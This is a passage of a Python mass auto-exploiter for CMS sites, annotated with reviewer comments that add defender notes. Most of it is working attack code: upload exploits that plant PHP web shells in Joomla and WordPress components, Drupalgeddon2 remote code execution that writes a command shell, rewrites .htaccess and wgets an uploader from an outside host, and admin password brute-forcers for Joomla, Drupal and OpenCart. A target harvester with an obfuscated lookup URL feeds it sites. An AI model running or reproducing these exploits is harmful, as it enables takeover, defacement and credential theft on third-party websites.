  3065. fileindex = {'file': open(self.indeX, 'rb')}
  3066. post_data = {"name": "vuln.php",
  3067. "submit": "Upload"}
  3068. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
  3069. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  3070. if '"jsonrpc"' in GoT.text.encode('utf-8'):
  3071. requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
  3072. requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
  3073. Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
  3074. Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
  3075. Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
  3076. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  3077. CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  3078.  
  3079. if 'Vuln!!' in Check.text.encode('utf-8'):
  3080. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  3081. self.Print_vuln_Shell(site + '/images/vuln.php')
  3082. with open('result/Shell_results.txt', 'a') as writer:
  3083. writer.write(site + '/images/vuln.php' + '\n')
  3084. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  3085. self.Print_Vuln_index(site + '/vuln.htm')
  3086. with open('result/Index_results.txt', 'a') as writer:
  3087. writer.write(site + '/vuln.htm' + '\n')
  3088. else:
  3089. self.Com_jwallpapers_index(site)
  3090. elif 'Vuln!!' in Check2.text.encode('utf-8'):
  3091. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  3092. self.Print_vuln_Shell(site + '/images/vuln.php')
  3093. with open('result/Shell_results.txt', 'a') as writer:
  3094. writer.write(site + '/images/vuln.php' + '\n')
  3095. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  3096. self.Print_Vuln_index(site + '/vuln.htm')
  3097. with open('result/Index_results.txt', 'a') as writer:
  3098. writer.write(site + '/vuln.htm' + '\n')
  3099. else:
  3100. self.Com_jwallpapers_index(site)
  3101. elif 'Vuln!!' in Check3.text.encode('utf-8'):
  3102. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  3103. self.Print_vuln_Shell(site + '/images/vuln.php')
  3104. with open('result/Shell_results.txt', 'a') as writer:
  3105. writer.write(site + '/images/vuln.php' + '\n')
  3106. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  3107. self.Print_Vuln_index(site + '/vuln.htm')
  3108. with open('result/Index_results.txt', 'a') as writer:
  3109. writer.write(site + '/vuln.htm' + '\n')
  3110. else:
  3111. self.Com_jwallpapers_index(site)
  3112. else:
  3113. self.Com_jwallpapers_index(site)
  3114. except:
  3115. self.Com_jwallpapers_index(site)
  3116.  
  3117.  
  # Probe of /components/com_facileforms/libraries/jquery/uploadify.php.
  # Flow as written: GET the script and continue on HTTP 200 or 500; POST
  # self.ShellPresta as multipart field 'Filedata' with form field
  # folder='/components/com_facileforms/libraries/jquery/'; fetch
  # .../jquery/up.php and look for 'Vuln!!' (logged to
  # result/Shell_results.txt). Otherwise the image is POSTed the same way and
  # .../jquery/<basename> is checked for 'GIF89a' (logged to
  # result/Index_results.txt).
  # Defender notes: the client-supplied 'folder' field names the destination,
  # so the upload lands beside the library's own scripts; file-integrity
  # monitoring on the component directory catches it. Remove the bundled
  # uploadify.php or update the component; the destination must be fixed
  # server-side, never taken from the request.
  # NOTE(review): there is no try/except here, so request errors propagate to
  # the caller.
  3118. def Com_facileforms(self, site):
  3119. Check = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
  3120. timeout=10)
  3121. if Check.status_code == 200 or Check.status_code == 500:
  3122. IndeX = {'Filedata': open(self.Jce_Deface_image, 'rb')}
  3123. ShellFile = {'Filedata': open(self.ShellPresta, 'rb')}
  3124. Datapost = {'folder': '/components/com_facileforms/libraries/jquery/'}
  3125. requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
  3126. files=ShellFile, data=Datapost, timeout=10)
  3127. CheckShell = requests.get('http://' + site +
  3128. '/components/com_facileforms/libraries/jquery/up.php', timeout=5)
  3129.  
  3130. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  3131. self.Print_vuln_Shell(site + '/components/com_facileforms/libraries/jquery/up.php')
  3132. with open('result/Shell_results.txt', 'a') as writer:
  3133. writer.write(site + '/components/com_facileforms/libraries/jquery/up.php\n')
  3134. else:
  3135. requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
  3136. files=IndeX, data=Datapost, timeout=10)
  3137.  
  3138. CheckIndex = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/'
  3139. + self.Jce_Deface_image.split('/')[1])
  3140. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  3141. self.Print_Vuln_index(site + '/components/com_facileforms/libraries/jquery/'
  3142. + self.Jce_Deface_image.split('/')[1])
  3143. with open('result/Index_results.txt', 'a') as writer:
  3144. writer.write(site + '/components/com_facileforms/libraries/jquery/'
  3145. + self.Jce_Deface_image.split('/')[1] + '\n')
  3146. else:
  3147. self.Print_NotVuln('Com_facileforms', site)
  3148. else:
  3149. self.Print_NotVuln('Com_facileforms', site)
  3150.  
  # Probe of /wp-content/plugins/barclaycart/uploadify/uploadify.php.
  # Flow as written: POST the local file self.pagelinesExploitShell as
  # multipart field 'Filedata' (no preliminary GET); then GET the same
  # basename under .../barclaycart/uploadify/. On HTTP 200 from that fetch,
  # GET /wp-content/vuln.php and /vuln.htm and look for 'Vuln!!' in each;
  # hits are appended to result/Shell_results.txt and
  # result/Index_results.txt.
  # Defender notes: the two follow-up URLs are not where the upload was sent,
  # so the uploaded script is presumably what creates them when it is
  # requested (its contents are not visible here). Indicators on disk:
  # settings_auto.php (the __init__ default basename) in the plugin's
  # uploadify/ directory, /wp-content/vuln.php and /vuln.htm. Remove the
  # bundled uploadify script or the plugin, and deny script execution in
  # plugin upload paths.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  3151. def barclaycart(self, site):
  3152. try:
  3153. ShellFile = {'Filedata': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
  3154. , 'multipart/form-data')}
  3155. Exp = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/uploadify.php'
  3156. requests.post(Exp, files=ShellFile, timeout=5)
  3157. Shell = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/' \
  3158. + self.pagelinesExploitShell.split('/')[1]
  3159. GoT = requests.get(Shell, timeout=5)
  3160. if GoT.status_code == 200:
  3161. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  3162. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  3163. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  3164. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  3165. with open('result/Shell_results.txt', 'a') as writer:
  3166. writer.write(site + '/wp-content/vuln.php' + '\n')
  3167. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  3168. self.Print_Vuln_index(site + '/vuln.htm')
  3169. with open('result/Index_results.txt', 'a') as writer:
  3170. writer.write(site + '/vuln.htm' + '\n')
  3171. else:
  3172. self.Print_NotVuln('barclaycart plugin', site)
  3173. else:
  3174. self.Print_NotVuln('barclaycart plugin', site)
  3175. except:
  3176. self.Print_NotVuln('barclaycart plugin', site)
  3177.  
  3178.  
  3179.  
  3180. class DrupalGedden2(object):
  # Constructor of DrupalGedden2: stores ANSI colour escape codes on the
  # instance, then immediately performs network I/O against `site`.
  # Flow as written: GET the front page; if the body contains
  # 'content="Drupal 7' call self.Version7Drupal(site); if it contains
  # 'content="Drupal 8' call self.Version8Drupal(site); otherwise call
  # self.Version7Drupal(site) anyway. Any exception prints "Not Vuln" under
  # the label 'Drupalgeddon2'.
  # Defender notes: the version test reads the generator meta tag, but the
  # default branch still runs the Drupal 7 routine, so hiding that tag does
  # not stop the probe; only applying the core security update does.
  # NOTE(review): Version8Drupal is defined outside this view.
  3181. def __init__(self, site):
  3182. self.r = '\033[31m'
  3183. self.g = '\033[32m'
  3184. self.y = '\033[33m'
  3185. self.b = '\033[34m'
  3186. self.m = '\033[35m'
  3187. self.c = '\033[36m'
  3188. self.w = '\033[37m'
  3189. self.rr = '\033[39m'
  3190. try:
  3191. CheckVersion = requests.get('http://' + site, timeout=5)
  3192. if 'content="Drupal 7' in CheckVersion.text.encode('utf-8'):
  3193. self.Version7Drupal(site)
  3194. elif 'content="Drupal 8' in CheckVersion.text.encode('utf-8'):
  3195. self.Version8Drupal(site)
  3196. else:
  3197. self.Version7Drupal(site)
  3198. except:
  3199. self.Print_NotVuln('Drupalgeddon2', site)
  3200.  
  3201. def Print_NotVuln(self, NameVuln, site):
  3202. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
  3203.  
  3204. def Print_Vuln_index(self, indexPath):
  3205. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
  3206.  
  3207. def Print_vuln_Shell(self, shellPath):
  3208. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
  3209.  
  3210. def Version7Drupal(self, site):
  3211. try:
  3212. payloadshell = "Vuln!!<?php system($_GET['cmd']); ?>"
  3213. PrivatePAyLoad = "echo 'Vuln!! patch it Now!' > vuln.htm;" \
  3214. " echo '" + payloadshell + "'> sites/default/files/vuln.php;" \
  3215. " echo '" + payloadshell + "'> vuln.php;" \
  3216. " cd sites/default/files/;" \
  3217. " echo 'AddType application/x-httpd-php .jpg' > .htaccess;" \
  3218. " wget 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php'"
  3219. get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
  3220. 'name[#markup]': PrivatePAyLoad, 'name[#type]': 'markup'}
  3221. post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
  3222.  
  3223. r = requests.post('http://' + site, data=post_params, params=get_params)
  3224. m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  3225. if m:
  3226. found = m.group(1)
  3227. get_params = {'q': 'file/ajax/name/#value/' + found}
  3228. post_params = {'form_build_id': found}
  3229. requests.post('http://' + site, data=post_params, params=get_params)
  3230. a = requests.get('http://' + site + '/sites/default/files/vuln.php', timeout=5)
  3231. if 'Vuln!!' in a.text.encode('utf-8'):
  3232. self.Print_vuln_Shell(site + '/sites/default/files/vuln.php?cmd=id')
  3233. with open('result/Shell_results.txt', 'a') as writer:
  3234. writer.write(site + '/sites/default/files/vuln.php?cmd=id' + '\n')
  3235. gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
  3236. CheckUploader = requests.get('http://' + site + '/sites/default/files/up.php', timeout=5)
  3237. if 'Vuln!!' in CheckUploader.text.encode('utf-8'):
  3238. self.Print_vuln_Shell(site + '/sites/default/files/up.php')
  3239. with open('result/Shell_results.txt', 'a') as writer:
  3240. writer.write(site + '/sites/default/files/up.php' + '\n')
  3241. if 'Vuln!!' in gg.text.encode('utf-8'):
  3242. self.Print_Vuln_index(site + '/vuln.htm')
  3243. with open('result/Index_results.txt', 'a') as writer:
  3244. writer.write(site + '/vuln.htm' + '\n')
  3245. else:
  3246. gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
  3247. if 'Vuln!!' in gg.text.encode('utf-8'):
  3248. self.Print_Vuln_index(site + '/vuln.htm')
  3249. with open('result/Index_results.txt', 'a') as writer:
  3250. writer.write(site + '/vuln.htm' + '\n')
  3251. Checkshell = requests.get('http://' + site + '/vuln.php', timeout=5)
  3252. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  3253. self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
  3254. with open('result/Shell_results.txt', 'a') as writer:
  3255. writer.write(site + '/vuln.php?cmd=id' + '\n')
  3256. else:
  3257. self.Print_NotVuln('Drupalgeddon2', site)
  3258. else:
  3259. self.Print_NotVuln('Drupalgeddon2', site)
  3260. except:
  3261. self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
  3262.  
  3263. def Version8Drupal(self, site):
  3264. try:
  3265. Exp = site + '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  3266. payloadshell = "<?php system($_GET['cmd']); ?>"
  3267.  
  3268. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
  3269. 'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> vuln.htm'}
  3270.  
  3271. payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
  3272. 'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + payloadshell + '"> vuln.php'}
  3273. r = requests.post('http://' + Exp, data=payload, timeout=5)
  3274. if r.status_code == 200:
  3275. a = requests.get('http://' + site + '/vuln.htm', timeout=5)
  3276. if 'Vuln!!' in a.text.encode('utf-8'):
  3277. requests.post('http://' + Exp, data=payload2, timeout=5)
  3278. CheckShell = requests.get('http://' + site + '/vuln.php', timeout=5)
  3279. if CheckShell.status_code == 200:
  3280. self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
  3281. with open('result/Shell_results.txt', 'a') as writer:
  3282. writer.write(site + '/vuln.php?cmd=id' + '\n')
  3283. self.Print_Vuln_index(site + '/vuln.htm')
  3284. with open('result/Index_results.txt', 'a') as writer:
  3285. writer.write(site + '/vuln.htm' + '\n')
  3286. else:
  3287. self.Print_Vuln_index(site + '/vuln.htm')
  3288. with open('result/Index_results.txt', 'a') as writer:
  3289. writer.write(site + '/vuln.htm' + '\n')
  3290. else:
  3291. self.Print_NotVuln('Drupalgeddon2', site)
  3292. else:
  3293. self.Print_NotVuln('Drupalgeddon2', site)
  3294. except:
  3295. self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
  3296.  
  3297.  
  3298.  
        # JooMLaBruteForce: password-guessing routine against the Joomla administrator
        # login at /administrator/index.php, user name fixed to "admin", using the short
        # list of common passwords in self.password. The work is done in the constructor.
        # Defender view: an admin account using any password in this list should be
        # treated as exposed. Login throttling or lockout, a second factor, and
        # restricting /administrator/ by source address all blunt this kind of guessing.
        # In logs it appears as a GET then a POST to /administrator/index.php per guess,
        # all with the fixed Firefox/28.0 User-Agent set in Joomla().
  3299. class JooMLaBruteForce(object):
  3300. def __init__(self, site):
        # flag is the success indicator: Joomla() sets it to 1 when a login works.
  3301. self.flag = 0
  3302. self.r = '\033[31m'
  3303. self.g = '\033[32m'
  3304. self.y = '\033[33m'
  3305. self.b = '\033[34m'
  3306. self.m = '\033[35m'
  3307. self.c = '\033[36m'
  3308. self.w = '\033[37m'
  3309. self.rr = '\033[39m'
  3310. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
  3311. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
  3312. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
  3313. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
  3314. "12", "123123"]
        # The loop is written to create one thread per password with a 0.08 s sleep.
        # NOTE(review): self.flag is still 0 when the loop starts, so the break on the
        # first pass is taken; as pasted, this constructor starts no thread and always
        # ends by printing the 'Not Vuln' line.
  3315. thread = []
  3316. for passwd in self.password:
  3317. t = threading.Thread(target=self.Joomla, args=(site, passwd))
  3318. if self.flag == 0:
  3319. break
  3320. else:
  3321. t.start()
  3322. thread.append(t)
  3323. time.sleep(0.08)
  3324. for j in thread:
  3325. j.join()
  3326. if self.flag == 0:
  3327. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
  3328. + self.y + 'Joomla BruteForce' + self.c + ' [Not Vuln]'
  3329.  
        # One login attempt with user "admin" and the given password.
        # Fetches the login page in a fresh session, pulls the name of a hidden field whose
        # value is "1" and the hidden 'option' value (presumably Joomla's per-session form
        # token and component name; confirm), falling back to '' and 'com_login' when the
        # regexes find nothing, then posts the form.
        # Success is judged by the substring 'logout' in the response body; on a hit the
        # URL, user name and password are appended in clear text to
        # result/Joomla_Hacked.txt and self.flag is set to 1.
        # All exceptions are swallowed silently.
  3330. def Joomla(self, site, passwd):
  3331. try:
  3332. sess = requests.session()
  3333. GetToken = sess.get('http://' + site + '/administrator/index.php', timeout=5)
  3334. try:
  3335. ToKeN = re.findall('type="hidden" name="(.*)" value="1"',
  3336. GetToken.text.encode('utf-8'))[0]
  3337. GeTOPtIoN = re.findall('type="hidden" name="option" value="(.*)"', GetToken.text.encode('utf-8'))[0]
  3338. except:
  3339. ToKeN = ''
  3340. GeTOPtIoN = 'com_login'
  3341. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  3342. post = {}
  3343. post['username'] = "admin"
  3344. post['passwd'] = passwd
  3345. post['lang'] = 'en-GB'
  3346. post['option'] = GeTOPtIoN
  3347. post['task'] = 'login'
  3348. post[ToKeN] = '1'
  3349. url = "http://" + site + "/administrator/index.php"
  3350. GoT = sess.post(url, data=post, headers=agent, timeout=10)
  3351. if 'logout' in GoT.text.encode('utf-8'):
  3352. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
  3353. self.r + site + ' ' + self.y + 'Joomla' + self.g + ' [Hacked!!]'
  3354. with open('result/Joomla_Hacked.txt', 'a') as writer:
  3355. writer.write('http://' + site + '/administrator/index.php' + '\n Username: admin' +
  3356. '\n Password: ' + passwd + '\n-----------------------------------------\n')
  3357. self.flag = 1
  3358. except Exception, e:
  3359. pass
  3360.  
        # DrupalBruteForce: password-guessing routine against the Drupal login form at
        # /user/login, user name fixed to "admin", using the same short list of common
        # passwords as the other brute-force classes in this file. The work is done in
        # the constructor.
        # Defender view: an admin account using any password in this list should be
        # treated as exposed. Flood control or lockout on the login form, a second factor,
        # and not naming the privileged account "admin" all blunt this kind of guessing.
        # In logs it appears as a GET then a POST to /user/login per guess, all with the
        # fixed Firefox/28.0 User-Agent set in Drupal().
  3361. class DrupalBruteForce(object):
  3362. def __init__(self, site):
        # flag is the success indicator: Drupal() sets it to 1 when a login works.
  3363. self.flag = 0
  3364. self.r = '\033[31m'
  3365. self.g = '\033[32m'
  3366. self.y = '\033[33m'
  3367. self.b = '\033[34m'
  3368. self.m = '\033[35m'
  3369. self.c = '\033[36m'
  3370. self.w = '\033[37m'
  3371. self.rr = '\033[39m'
  3372. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
  3373. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
  3374. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
  3375. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
  3376. "12", "123123"]
        # The loop is written to create one thread per password with a 0.08 s sleep.
        # NOTE(review): self.flag is still 0 when the loop starts, so the break on the
        # first pass is taken; as pasted, this constructor starts no thread and always
        # ends by printing the 'Not Vuln' line.
  3377. thread = []
  3378. for passwd in self.password:
  3379. t = threading.Thread(target=self.Drupal, args=(site, passwd))
  3380. if self.flag == 0:
  3381. break
  3382. else:
  3383. t.start()
  3384. thread.append(t)
  3385. time.sleep(0.08)
  3386. for j in thread:
  3387. j.join()
  3388. if self.flag == 0:
  3389. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
  3390. + self.y + 'Drupal BruteForce' + self.c + ' [Not Vuln]'
  3391.  
        # One login attempt with user "admin" and the given password.
        # Fetches /user/login in a fresh session and reads the value of the submit button
        # (field 'op'), falling back to 'Log in' when the regex finds nothing, then posts
        # name, pass, form_id=user_login and op.
        # Success is judged by the substring 'Log out' in the response body; on a hit the
        # URL, user name and password are appended in clear text to
        # result/Drupal_Hacked.txt and self.flag is set to 1.
        # All exceptions are swallowed silently.
  3392. def Drupal(self, site, passwd):
  3393. try:
  3394. sess = requests.session()
  3395. GetToken = sess.get('http://' + site + '/user/login', timeout=5)
  3396. try:
  3397. GetOP = re.findall('id="edit-submit" name="op" value="(.*)"',
  3398. GetToken.text.encode('utf-8'))[0].split('"')[0]
  3399. except:
  3400. GetOP = 'Log in'
  3401. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  3402. post = {}
  3403. post['name'] = "admin"
  3404. post['pass'] = passwd
  3405. post['form_id'] = 'user_login'
  3406. post['op'] = GetOP
  3407. url = "http://" + site + "/user/login"
  3408. GoT = sess.post(url, data=post, headers=agent, timeout=10)
  3409. if 'Log out' in GoT.text.encode('utf-8'):
  3410. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
  3411. self.r + site + ' ' + self.y + 'Drupal' + self.g + ' [Hacked!!]'
  3412. with open('result/Drupal_Hacked.txt', 'a') as writer:
  3413. writer.write('http://' + site + '/user/login' + '\n Username: admin' + '\n Password: ' +
  3414. passwd + '\n-----------------------------------------\n')
  3415. self.flag = 1
  3416.  
  3417. except Exception, e:
  3418. pass
  3419.  
        # OpenCart: password-guessing routine against the OpenCart admin login at
        # /admin/index.php, user name fixed to "admin", using the same short list of
        # common passwords as the other brute-force classes in this file. The work is
        # done in the constructor.
        # Defender view: an admin account using any password in this list should be
        # treated as exposed. Renaming or IP-restricting the admin directory, login
        # throttling and a second factor all blunt this kind of guessing. In logs it
        # appears as bare POSTs to /admin/index.php (no preceding GET) with the fixed
        # Firefox/28.0 User-Agent set in opencart().
  3420. class OpenCart(object):
  3421. def __init__(self, site):
        # flag is the success indicator: opencart() sets it to 1 when a login works.
  3422. self.flag = 0
  3423. self.r = '\033[31m'
  3424. self.g = '\033[32m'
  3425. self.y = '\033[33m'
  3426. self.b = '\033[34m'
  3427. self.m = '\033[35m'
  3428. self.c = '\033[36m'
  3429. self.w = '\033[37m'
  3430. self.rr = '\033[39m'
  3431. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
  3432. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
  3433. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
  3434. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
  3435. "12", "123123"]
        # The loop is written to create one thread per password with a 0.08 s sleep.
        # NOTE(review): self.flag is still 0 when the loop starts, so the break on the
        # first pass is taken; as pasted, this constructor starts no thread and always
        # ends by printing the 'Not Vuln' line.
  3436. thread = []
  3437. for passwd in self.password:
  3438. t = threading.Thread(target=self.opencart, args=(site, passwd))
  3439. if self.flag == 0:
  3440. break
  3441. else:
  3442. t.start()
  3443. thread.append(t)
  3444. time.sleep(0.08)
  3445. for j in thread:
  3446. j.join()
  3447. if self.flag == 0:
  3448. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
  3449. + self.y + 'OpenCart' + self.c + ' [Not Vuln]'
  3450.  
        # One login attempt with user "admin" and the given password, sent as a single
        # POST of username/password with no session and no token fetched first.
        # Success is judged by the substring 'Logout' in the response body; on a hit the
        # URL, user name and password are appended in clear text to
        # result/OpenCart_Hacked.txt and self.flag is set to 1.
        # All exceptions are swallowed silently.
  3451. def opencart(self, site, passwd):
  3452. try:
  3453. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  3454. post = {}
  3455. post['username'] = "admin"
  3456. post['password'] = passwd
  3457. url = "http://" + site + "/admin/index.php"
  3458. GoT = requests.post(url, data=post, headers=agent, timeout=10)
  3459. if 'Logout' in GoT.text.encode('utf-8'):
  3460. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
  3461. self.r + site + ' ' + self.y + 'OpenCart' + self.g + ' [Hacked!!]'
  3462. with open('result/OpenCart_Hacked.txt', 'a') as writer:
  3463. writer.write('http://' + site + '/admin/index.php' + '\n Username: admin' + '\n Password: ' +
  3464. passwd + '\n-----------------------------------------\n')
  3465. self.flag = 1
  3466. except Exception, e:
  3467. pass
  3468.  
  3469.  
  3470.  
        # reverse_ipz: target-list builder. Given a domain or IP it resolves the address
        # and asks a third-party reverse-IP lookup page which other host names share it,
        # writing one host name per line under logs/.
        # The lookup URL is stored base64-encoded; the literal decodes to
        # 'http://viewdns.info/reverseip/?host='.
        # Defender view: this is why one weak site on shared hosting exposes its
        # neighbours. Every name on the same address ends up in the same target file.
  3471. class reverse_ipz(object):
  3472. def __init__(self):
        # Fixed browser-like request headers sent with the lookup request.
  3473. self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
  3474. 'Accept': '*/*'}
        # Strips a leading http:// or https:// (str.replace removes every occurrence, not
        # only the prefix), resolves the name with socket.gethostbyname, and calls
        # sys.exit() if resolution fails.
        # Host names are pulled from '<tr> <td>...</td>' cells of the response.
        # When exactly 1000 names come back (presumably the lookup page's result cap;
        # confirm) they go to logs/<ip>x.txt and BingDorker.ip_bing is called for the
        # same address; otherwise they go straight to logs/<ip>.txt.
        # The HTTP request and file writes are not wrapped in try/except here.
  3475. def Reverse_ip(self, domain_Or_ipAddress):
  3476.  
  3477. Check = domain_Or_ipAddress
  3478. if Check.startswith("http://"):
  3479. Check = Check.replace("http://", "")
  3480. elif Check.startswith("https://"):
  3481. Check = Check.replace("https://", "")
  3482. else:
  3483. pass
  3484. try:
  3485. self.ip = socket.gethostbyname(Check)
  3486. except:
  3487. sys.exit()
  3488. Rev = requests.get(binascii.a2b_base64('aHR0cDovL3ZpZXdkbnMuaW5mby9yZXZlcnNlaXAvP2hvc3Q9') + self.ip + '&t=1',
  3489. headers=self.headers, timeout=5)
  3490. Revlist = re.findall('<tr> <td>((([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}))</td>', Rev.text)
  3491. if len(Revlist) == 1000:
  3492. for url in Revlist:
  3493. with open('logs/' + self.ip + 'x.txt', 'a') as xx:
  3494. xx.write(str(url[0]) + '\n')
  3495. gotoBing = BingDorker()
  3496. gotoBing.ip_bing(self.ip)
  3497. else:
  3498. for url in Revlist:
  3499. with open('logs/' + self.ip + '.txt', 'a') as xx:
  3500. xx.write(str(url[0]) + '\n')
  3501.  
  3502.  
        # BingDorker: second target-list source. Uses the Bing 'ip:' search operator to
        # enumerate sites hosted on one address and merges them into logs/<ip>.txt.
  3503. class BingDorker(object):
        # Strips a leading http:// or https://, resolves the name (sys.exit() on failure),
        # then requests Bing result pages for 'ip:<address>' with the 'first' offset
        # running from 0 to 500 in steps of 10, a new session per page.
        # Host names are taken from the '<h2><a href="...">' result links, the scheme is
        # stripped, and everything except go.microsoft.com is appended to the temporary
        # file logs/<ip>x.txt.
        # The temporary file is then read back, de-duplicated through a set, appended to
        # logs/<ip>.txt and deleted.
        # NOTE(review): with the indentation lost it is not clear from this listing
        # whether the de-duplication runs once after the paging loop or on every page.
        # 'count' is incremented but not read anywhere in the code shown, and the local
        # name 'next' shadows the builtin.
        # IOError and IndexError both end the process through sys.exit().
  3504. def ip_bing(self, __ip):
  3505. try:
  3506. if __ip.startswith("http://"):
  3507. __ip = __ip.replace("http://", "")
  3508. elif __ip.startswith("https://"):
  3509. __ip = __ip.replace("https://", "")
  3510. else:
  3511. pass
  3512. try:
  3513. ip = socket.gethostbyname(__ip)
  3514. except:
  3515. sys.exit()
  3516. next = 0
  3517. while next <= 500:
  3518. url = "http://www.bing.com/search?q=ip%3A" + ip + "&first=" + str(next) + "&FORM=PORE"
  3519. sess = requests.session()
  3520. cnn = sess.get(url, timeout=5)
  3521. next = next + 10
  3522. finder = re.findall(
  3523. '<h2><a href="((?:https://|http://)[a-zA-Z0-9-_]+\.*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11})',
  3524. cnn.text)
  3525. for url in finder:
  3526. if url.startswith('http://'):
  3527. url = url.replace('http://', '')
  3528. elif url.startswith('https://'):
  3529. url = url.replace('https://', '')
  3530. else:
  3531. pass
  3532. with open("logs/" + ip + "x.txt", 'a') as f:
  3533. if 'go.microsoft.com' in url:
  3534. pass
  3535. else:
  3536. f.write(str(url + '\n'))
  3537. lines = open("logs/" + ip + "x.txt", 'r').read().splitlines()
  3538. lines_set = set(lines)
  3539. count = 0
  3540. for line in lines_set:
  3541. with open("logs/" + ip + ".txt", 'a') as xx:
  3542. count = count + 1
  3543. xx.write(line + '\n')
  3544. os.unlink("logs/" + ip + "x.txt")
  3545. except IOError:
  3546. sys.exit()
  3547. except IndexError:
  3548. sys.exit()
  3549.  
  3550.  
        # Module-level entry: constructing AutoExploiter happens as soon as the file is
        # run or imported. Its __init__ begins by creating the result/ and logs/
        # directories (see the top of the file); the rest of the constructor is not
        # visible in this part of the listing.
  3551. Rock = AutoExploiter()